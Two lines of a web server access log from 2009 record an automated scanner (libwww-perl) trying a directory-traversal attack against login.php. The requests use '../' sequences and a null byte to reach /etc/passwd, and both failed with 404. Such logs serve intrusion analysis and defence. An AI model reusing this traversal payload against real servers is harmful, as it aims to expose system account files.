221.143.51.115 - - [18/Jul/2009:03:57:27 -0400] "GET /logs/access_log.Q109061300/login.php?dir=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
221.143.51.115 - - [18/Jul/2009:03:57:28 -0400] "GET /login.php?dir=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.79"
